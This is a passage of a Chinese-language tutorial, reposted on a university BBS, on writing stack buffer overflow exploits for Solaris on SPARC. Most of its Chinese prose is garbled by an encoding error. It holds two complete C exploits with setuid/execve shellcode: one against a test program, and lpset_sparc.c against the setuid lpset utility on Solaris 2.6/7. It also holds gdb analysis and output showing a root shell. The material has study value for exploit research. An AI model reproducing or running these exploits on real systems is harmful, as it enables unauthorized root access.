µØÖ· -----------------------------> ¸ßÖ·
%fp %fp+32
----------------------------------------------------------------
| buffer | ±£ÁôÇøÓò | %l0-%l7 | %i0 - %i7 | ..... |
----------------------------------------------------------------
| RET ... RET ... RET | NOPNOP...SHELLCODE |
----------------------------------------------------------------
| ^
| |
\--------------------------/
¶þÊǽ«shellcode·Åµ½»·¾³±äÁ¿ÖÐÈ¥£¬½«RETÖ¸Ïò»·¾³±äÁ¿£¬
µØÖ· -----------------------------> ¸ßÖ·
%fp %fp+32 environ
------------------------------------------- ---------------------
| buffer | ±£ÁôÇøÓò | %l0-%l7 | %i0 - %i7 | | ..... |
------------------------------------------- ---------------------
| RET ... RET ... RET | | NOPNOP...SHELLCODE |
-------------------------------------------- -------------------
| ^
| |
\-----------------------------/
²ÉÓÃÄÄÖÖ·½·¨ÀíÂÛÉ϶¼ÊÇ¿ÉÒԵġ£ÔÚÕâÀïÎÒÖ»¾ÙÒ»¸öÀý×Ó£¬Ê¹Óû·¾³±äÁ¿À´´æ·ÅÎÒÃǵÄ
shellcode.ÐèҪעÒâµÄÎÊÌâÊÇ£¬
(1) ÕâÀïµÄNOPÖ¸ÁîÊÇ4¸ö×Ö½ÚµÄÖ¸ÁÕâÒªÇóÎÒÃǵķµ»ØµØÖ·±ØÐëÖ¸ÏòNOPÖ¸ÁîµÄµÚÒ»¸ö
×Ö½ÚÔÚi386ÖÐ,NOPÖ¸ÁîÊÇÒ»¸ö×Ö½Ú£¬Òò´Ë£¬ÒªÇó²¢²»ÕâôÑϸñ)
(2) NOPÖ¸ÁîµÄÆðʼµØÖ·±ØÐëÔÚ4×ֽڱ߽çÉÏ£¨Äܱ»ËÄÕû³ý)£¬·ñÔò½«µ¼ÖÂ×ÜÏß´íÎó¡£
(3) ÔÚSPARCƽ̨ÏÂ,¶ÑÕ»ÖÐbufferµÄ´óСÊÇ°´8µÄ±¶Êý·ÖÅäµÄ,ÕâÊÇÔÚÈ·¶¨buffer´óСµÄ
ʱºòҪעÒâµÄ¡£
2.3 Ò»¸öÕë¶Ôvul.cµÄ²âÊÔ³ÌÐòexp.c
ÏÂÃæÊÇÒ»¸ö²âÊÔ³ÌÐò£¬ÓÃÀ´¹¥»÷ÎÒÃÇÇ°ÃæµÄvul.c¡£ÎÒÃDzÉÓÃexecle()Ö´ÐÐ./vul,ʹÎÒÃÇ
µÄ»·¾³±äÁ¿¾¡¿ÉÄܵÄÉÙ£¬ÎÒÃǵÄshellcode½«·ÅÔÚ¶ÑÕ»µÄ¸ß¶Ë,Õâ¸öµØÖ·ÊÇÏà¶Ô¹Ì¶¨µÄ£¬
±È½ÏÈÝÒײ²⡣µ÷Õûoffset(±ØÐëÊÇ4µÄ±¶Êý)ʹ·µ»ØµØÖ·ÂäÔÚNOPÖ¸Áîµ±ÖУ¬Èç¹û¸ÃµØÖ·
²»
ÓëNOPÖ¸ÁîµÄµÚÒ»¸ö×Ö½Ú¶ÔÆ룬ÔÙµ÷ÕûalignµÄÖµ(´Ó0-3¼´¿É),ʹ֮¶ÔÆë¡£
--------------------------------------------------------------------------
/*
* exp.c -- test exploit for vul.c in Solaris for SPARC .
* gcc -o exp exp.c
* by warning3 <warning3@hotmail.com>
* y2k/5/5
*/
#include <stdio.h>
#define BUFSIZE 8 /* the size of overflowed buffer*/
#define EGGSIZE 1024 /* the egg buffer size */
#define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" */
#define ALIGN 0 /* If don't work ,try adjust align to 0,1,2,3 */
#define OFFSET 1500
char shellcode[] = /* from scz's funny shellcode for SPARC */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
/* get current stack point address to guess Return address */
long get_esp(void)
{
__asm__("mov %sp,%i0");
}
main( int argc, char **argv )
{
char *pattern,eggbuf[EGGSIZE],*env[2];
long retaddr, i;
long bufsize=BUFSIZE, offset=OFFSET, align=ALIGN, patternsize ;
long *addrptr;
if( argc > 1 ) align = atoi(argv[1]);
if( argc > 2 ) offset = atoi(argv[2]);
if( argc > 3 ) bufsize = atoi(argv[3]);
retaddr = get_esp() + offset; /* Guess return address */
printf("Usages: %s <align> <offset> <bufsize> \n\n", argv[0] );
printf("Using RET address = 0x%x ,Bufsize = %d, Offset = %d, Align=
%d\n"
, retaddr, bufsize, offset, align );
/* bufsize + reserved area + saved in/local + NULL */
patternsize = bufsize + 4*4 + 16*4 + 1;
if((pattern = (char *)malloc(patternsize)) == NULL) {
printf("Can't get enough memory!\n");
exit(-1);
}
memset(pattern, 'C', patternsize );/* fill pattern buffer with garbage
*/
addrptr = (long *) (pattern + bufsize + 4*4 ); /* move to saved %l0 */
/* Let's overwrite caller function's saved stack frame */
for( i = 0 ; i < 16 ; i ++ )
*addrptr++ = retaddr; /* saved (%l0-%l7),(%i0-%i7) */
/* construct shellcode buffer */
memset(eggbuf,'A',EGGSIZE); /* fill the eggbuf with garbage */
for (i = align; i < EGGSIZE; i+=4) { /* fill with NOP */
eggbuf[i+3]=NOP & 0xff;
eggbuf[i+2]=(NOP >> 8 ) &0xff;
eggbuf[i+1]=(NOP >> 16 ) &0xff;
eggbuf[i+0]=(NOP >> 24 ) &0xff; /* Big endian */
}
/* Notice : we assume the length of shellcode can be divided exatcly
by 4 .
If not, exploit will fail. Anyway, our shellcode is. ;-)
*/
memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode,
strlen(shellcode));
memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
env[0] = eggbuf; /* put eggbuf in env */
env[1] = NULL; /* end of env */
execle("./vul", "./vul",pattern,NULL,env);
} /* end of main */
--------------------------------------------------------------------------
²âÊÔһϣº
[warning3@sun1 test]$ ls -l vul exp
-rwxr-xr-x 1 root other 25664 May 5 10:17 exp
-rwsr-xr-x 1 root other 24576 May 4 23:25 vul
[warning3@sun1 test]$ id
uid=100(warning3) gid=1(other)
[warning3@sun1 test]$ ./exp
Usages: ./exp <align> <offset> <bufsize>
Using RET address = 0xffbefe0c ,Bufsize = 8, Offset = 1500, Align= 0
CCCCCCCCCCCCCCCCCCCCCCCCÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
ÿ?
C
# id
uid=0(root) gid=1(other) <---- ³É¹¦ÁË!
#
2.4 Ò»¸öʵ¼Ê²âÊÔ³ÌÐòµÄ±àд¹ý³Ì(lpset_sparc.c)
ÏÂÃæÎÒÃÇÒÔÒ»¸öʵ¼ÊµÄÀý×ÓÀ´ÏêϸµÄ½²ÊöÔõÑùдһ¸ö¹¥»÷³ÌÐò¡£ÔÚSolarisÏÂlpset±»Éè
ÖÃÁËsuid룬µ±¸øËüµÄ"-a"¿ª¹ØÌṩһ¸öºÜ³¤µÄ²ÎÊýʱ£¬½«µ¼ÖÂËü·¢ÉúÒç³ö¡£(Õâ¸ö©¶´
ÊÇÈÕ±¾°²È«Ð¡×éThe Shadow Penguin Security·¢ÏÖµÄ)
ÏÈÀ´¿´¿´man lpset:
NAME
lpset - set printing configuration in /etc/printers.conf or
FNS
SYNOPSIS
lpset [-n system | fns ] [ -x ] [ -a key=value ] [
-d key ] destination
...
ÎÒÃÇ¿´µ½£¬"-a"µÄ²ÎÊýÖбØÐë°üº¬Ò»¸ö"="ºÅ£¬·ñÔò²»ÄÜÕý³£¹¤×÷¡£
²âÊÔһϣº
[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x800'` blah
write operation failed <----- ûÓÐÒç³ö
[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x1024'` blah
×ÜÏß´íÎó (core dumped) <----- OK,Òç³ö·¢ÉúÁË
[root@ /test]> gdb /usr/bin/lpset core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
<...Ê¡ÂÔÏÔʾÄÚÈÝ...>
(no debugging symbols found)...done.
#0 0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
(gdb) bt
#0 0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
Cannot access memory at address 0x41414179.
(gdb) i r
<.....>
o0 0x100 256
o1 0xff38a698 -13064552
o2 0x27fa8 163752
o3 0xff3784d0 -13138736
o4 0x100 256
o5 0xff3770c4 -13143868
sp 0xffbef6d0 -4262192 <--- µ±Ç°¶ÑÕ»Ö¸Õë
o7 0xff3770c4 -13143868
l0 0x41414141 1094795585 <--- localºÍin¶¼ÒѾ±»»Ö¸´³ÉÎÒÃÇÌî³ä
l1 0x41414141 1094795585 µÄÊý¾Ý0x41414141
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585
<.....>
pc 0xff3770cc -13143860 <--- ÎÒÃÇ¿´¿´³ÌÐòÏÂÒ»²½¸Ã¸ÉʲôÁË
npc 0xff3770d0 -13143856
<.....>
(gdb) disass 0xff3770cc
<.....>
0xff3770c4 <ns_printer_put+76>: call %o1
0xff3770c8 <ns_printer_put+80>: mov %i0, %o0
0xff3770cc <ns_printer_put+84>: ret <--- ÏÂÒ»²½Òª·µ»ØÁË
0xff3770d0 <ns_printer_put+88>: restore %g0, %o0, %o0
0xff3770d4 <ns_printer_put+92>: mov -1, %i0
0xff3770d8 <ns_printer_put+96>: ret
0xff3770dc <ns_printer_put+100>: restore
End of assembler dump.
(gdb) x/32x $sp
0xffbef6d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef6e0: 0x41414141 0x41414141 0x41414141 0x41414141<--%l0-%l7
0xffbef6f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef700: 0x41414141 0x41414141 0x41414141 0x41414141<--%i0-%i7
0xffbef710: 0x41412220 0x3e2f6465 0x762f6e75 0x6c6c2032
------
\--- ¶àÁËÁ½¸ö×Ö½Ú
0xffbef720: 0x3e263100 0x00000001 0x00ff0000 0x00011100
0xffbef730: 0x78666e5f 0x7075745f 0x7072696e 0x74657200
0xffbef740: 0x00000000 0xff31e128 0xffbef750 0x00000000
ºÜÃ÷ÏÔ£¬³ÌÐòÊÇÔÚÖ´ÐÐÍêcall %o1ÒÔºó£¬ÔÙÖ´ÐÐret/restoreʱ³ö´íµÄ¡£ÎÒÃÇ¿´µ½Õâʱºò
£¬
%i0-%i7ºÍ%l0-%l7ÒѾ±»»Ö¸´³ÉÎÒÃÇÊäÈëµÄÊý¾Ý¡£´ÓÕâÀïÎÒÃÇÆäʵÒѾ¿ÉÒÔ²âËã³öÎÒÃÇ
ÐèÒªµÄbufsizeÁË£¬bufsize= (1024 + 2) - 2 - 8*8 - 4*4 = 944×Ö½Ú¡£
²»¹ýÎÒÃÇ»¹ÊÇÀ´È·ÈÏһϱȽϺã¬ÎÒÃÇÔÚ¶ÑÕ»ÖÐÕÒÒ»ÕÒ"call %o1"µÄÕ»Ö¡£¬¼´È»ÎÒÃÇÊä
ÈëµÄ²ÎÊý³¤¶ÈÒѾÓÐ1026³¤ÁË£¬ÄÇôÎÒÃǼì²éһϵ±Ç°%sp-1200Ç°¶¼ÓÐЩʲôÄÚÈÝ£º
(gdb) x/1000x $sp-1200
0xffbef240: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef250: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef260: 0x7ffffbac 0xffbef723 0xff3375e0 0xff3375d8
0xffbef270: 0x41414141 0x2200cd08 0xff000000 0x00ff0000
\--------- ÉÏÒ»¸ö±»µ÷º¯ÊýµÄÕ»Ö¡ÆðʼµØÖ·
0xffbef280: 0x0000ff00 0x01010100 0x00000000 0x00000000<--%l0-%l7
0xffbef290: 0x000252c0 0xff38a698 0x00027fa8 0xff3784d0
0xffbef2a0: 0x00000100 0xff3770c4 0xffbef6d0 0xff3770c4<--%i0-%i7
\---------- ÎÒÃǵĵ±Ç°¶ÑÕ»Ö¸Õë
0xffbef2b0: 0x000229d0 0xffbef2d0 0x00000000 0xff38b630
0xffbef2c0: 0xff38b64c 0x00026220 0x00027fa8 0x00000002<--²ÎÊýÓò
0xffbef2d0: 0x2f757372 0x2f62696e 0x2f666e63 0x72656174
\---------- ¾Ö²¿±äÁ¿ÆðʼµØÖ·
0xffbef2e0: 0x655f7072 0x696e7465 0x72202d73 0x20746869
0xffbef2f0: 0x736f7267 0x756e6974 0x2f736572 0x76696365
0xffbef300: 0x2f707269 0x6e746572 0x20626c61 0x68202022
0xffbef310: 0x413d4141 0x41414141 0x41414141 0x41414141
\---------- ÎÒÃÇÊäÈëµÄ²ÎÊýµÄÆðʼµØÖ·
<......>
ÎÒÃǺÜÈÝÒ×¾ÍÕÒµ½ÁËÉÏÒ»¸ö±»µ÷º¯ÊýµÄջ֡λÖÃ(0xffbef270),¾Ö²¿±äÁ¿µÄÆðʼµØÖ·
ÊÇ0xffbef2d0,¶øÎÒÃÇÊäÈëµÄ²ÎÊý±»·Åµ½ÁË0xffbef310´¦£¬ÈÃÎÒÃÇ¿´µÃ¸üÇå³þÒ»µã:
(gdb) x/10s 0xffbef2d0
0xffbef2d0: "/usr/bin/fncreate_printer -s thisorgunit/service/printer blah
\"A="
, 'A' <repeats 134 times>...
0xffbef398: 'A' <repeats 200 times>...
0xffbef460: 'A' <repeats 200 times>...
0xffbef528: 'A' <repeats 200 times>...
0xffbef5f0: 'A' <repeats 200 times>...
0xffbef6b8: 'A' <repeats 90 times>, "\" >/dev/null 2>&1"
0xffbef724: ""
0xffbef725: ""
0xffbef726: ""
0xffbef727: "\001"
ÕâÑùÎÒÃǾͿÉÒԵõ½×¼È·µÄbufsizeÁË,bufsize=(0xffbef6d0-0xffbef310) - 4*4 = 944
,ºÍÇ°ÃæÍÆËãµÄÎǺϡ£ÁíÍâÐèҪעÒâµÄÊÇ£º
ÎÒÃÇ¿´µ½"blah"ÊÇÎÒÃÇÊäÈëµÄ´òÓ¡»úÃû³Æ£¬Ëü±»·Åµ½ÁË"\"A=AA...A\"Ç°Ã棬Òò´Ë£¬Èç¹û
´òÓ¡»úÃû³Æ³¤¶ÈÓб仯,½«µ¼ÖÂÕû¸ö"\"A=AA...A\"Íù¸ßÖ··½ÏòÒƶ¯£¬Òò´Ëʵ¼ÊÌî³äµÄ×Ö
½ÚÊýÊǺʹòÓ¡»úÃû³Æ³¤¶ÈÓйصġ£Êµ¼ÊÌî³ä³¤¶È= 944 + 4("blah"³¤¶ÈΪ4¸ö×Ö½Ú) -
strlen(printer).
ÓÐÁËÉÏÃæµÄ·ÖÎö£¬ÎÒÃǾͿÉÒÔÀ´Ð´²âÊÔ³ÌÐòÁË£º
--------------------------------------------------------------------------------
---------
/* ---> lpset_sparc.c <---
* lpset exploit for Solaris 2.6/7 Sparc .
*
* It is one test for writing exploits in Sparc ,just for EDUCATIONAL purpose.:)
* tested in Solaris 2.6/7 /sparc.
* Usages:
* ./lpset_sparc <align> <offset> <bufsize>
* in most cases, bufsize is fixed, offset=1500 is OK .
* If it don't work, you just need adjust align value from 0 to 3.
* by warning3@hotmail.com
* y2k/5/5
*/
#include <stdio.h>
#define BUFSIZE 944 /* the size of overflowed buffer*/
#define EGGSIZE 1024 /* the egg buffer size */
#define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" */
#define ALIGN 1 /* If don't work ,try adjust align to 0,1,2,3 */
#define OFFSET 1500
#define PRINTER "blah"
char shellcode[] = /* from scz's funny shellcode for SPARC */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
/* get current stack point address to guess Return address */
long get_esp(void)
{
__asm__("mov %sp,%i0");
}
main( int argc, char **argv )
{
char *pattern,eggbuf[EGGSIZE],*env[2];
long retaddr, i;
long bufsize=BUFSIZE, offset=OFFSET, align=ALIGN, patternsize ;
long *addrptr;
if( argc > 1 ) align = atoi(argv[1]);
if( argc > 2 ) offset = atoi(argv[2]);
if( argc > 3 ) bufsize = atoi(argv[3]);
retaddr = get_esp() + offset; /* Guess return address */
printf("Usages: %s <align> <offset> <bufsize> \n\n", argv[0] );
printf("Using RET address = 0x%x ,Bufsize = %d, Offset = %d, Align=
%d\n"
, retaddr, bufsize, offset, align );
/* bufsize + reserved area + saved in/local + NULL */
patternsize = bufsize + 4*4 + 16*4 + 1;
if((pattern = (char *)malloc(patternsize)) == NULL) {
printf("Can't get enough memory!\n");
exit(-1);
}
memset(pattern, 'C', patternsize );/* fill pattern buffer with garbage
*/
memset(pattern+20, 0x3d, 1); /* put '=' into buf */
addrptr = (long *) (pattern + bufsize + 4*4 ); /* move to saved %l0 */
/* Let's overwrite caller function's saved stack frame
*/
for( i = 0 ; i < 16 ; i ++ )
*addrptr++ = retaddr; /* saved (%l0-%l7),(%i0-%i7) */
/* construct shellcode buffer */
memset(eggbuf,'A',EGGSIZE); /* fill the eggbuf with garbage */
for (i = align; i < EGGSIZE; i+=4) /* fill with NOP */
{
eggbuf[i+3]=NOP & 0xff;
eggbuf[i+2]=(NOP >> 8 ) &0xff;
eggbuf[i+1]=(NOP >> 16 ) &0xff;
eggbuf[i+0]=(NOP >> 24 ) &0xff; /* Big endian */
}
/* Notice : we assume the length of shellcode can be divided exatcly
by 4 .
If not, exploit will fail. Anyway, our shellcode is. ;-)
*/
memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode,
strlen(shellcode));
memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
env[0] = eggbuf; /* put eggbuf in env */
env[1] = NULL; /* end of env */
/* adjust pattern size by printer length */
execle("/usr/bin/lpset", "lpset","-n","fns"
,"-a",(pattern + strlen(PRINTER) - 4 ),PRINTER,NULL,env);
} /* end of main */
--------------------------------------------------------------------------------
----------------
[warning3@sun1 test]$ gcc -o lp_ex lpset_sparc.c
[warning3@sun1 test]$ ./lp_ex
Usages: ./lp_ex <align> <offset> <bufsize>
Using RET address = 0xffbefcb4 ,Bufsize = 944, Offset = 1500, Align= 1
# id
uid=0(root) gid=1(other) <--- ³É¹¦ÁË!
#
ͨ¹ýÉÏÃæµÄÀý×Ó£¬ÎÒÏë¶ÁÕßÒѾ·¢ÏÖ£¬ÔÚSolarisÏÂдÒç³ö³ÌÐòÆäʵҲûÓÐʲôÌرðµÄ
Äѵ㡣ֻҪÀí½âÁ˺¯Êýµ÷ÓõĻúÀí£¬ÔÙ×¢ÒâÒ»ÏÂSPARC¼Ü¹¹µÄÌØÊâÐÔ(±ÈÈ磬±ß½ç¶ÔÆë),
Ó¦¸ÃºÜÈÝÒ׾ͿÉÒÔ×Ô¼º¶¯ÊÖдÁË¡£
°æȨËùÓУ¬Î´¾Ðí¿É£¬²»µÃתÔØ
»¶Ó·ÃÎÊÎÒÃǵÄÕ¾µãhttp://www.isbase.com/
ÂÌÉ«±øÍŸøÄú°²È«µÄ±£ÕÏ
--
¡î À´Ô´:£®BBS ÀóÔ°³¿·çÕ¾ bbs.szu.edu.cn£®[FROM: bbs@192.168.28.106]
--
¡ù תÔØ:¡¤BBS ÀóÔ°³¿·çÕ¾ bbs.szu.edu.cn¡¤[FROM: bbs.szptt.net.cn]
[»Øµ½¿ªÊ¼]
[ÉÏһƪ][ÏÂһƪ]
ÀóÔ°ÔÚÏßÊ×Ò³ ÓÑÇéÁ´½Ó£ºÉîÛÚ´óѧ Éî´óÕÐÉú ÀóÔ°³¿·çBBS S-TermÈí¼þ ÍøÂçÊéµê